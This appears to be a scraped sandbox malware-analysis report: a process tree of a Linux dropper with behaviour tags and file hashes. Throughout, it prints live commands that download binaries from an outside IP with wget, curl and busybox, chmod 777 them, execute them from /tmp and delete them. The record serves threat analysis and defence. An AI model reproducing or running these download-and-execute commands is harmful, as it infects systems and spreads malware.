/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:954
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:960
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:966
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97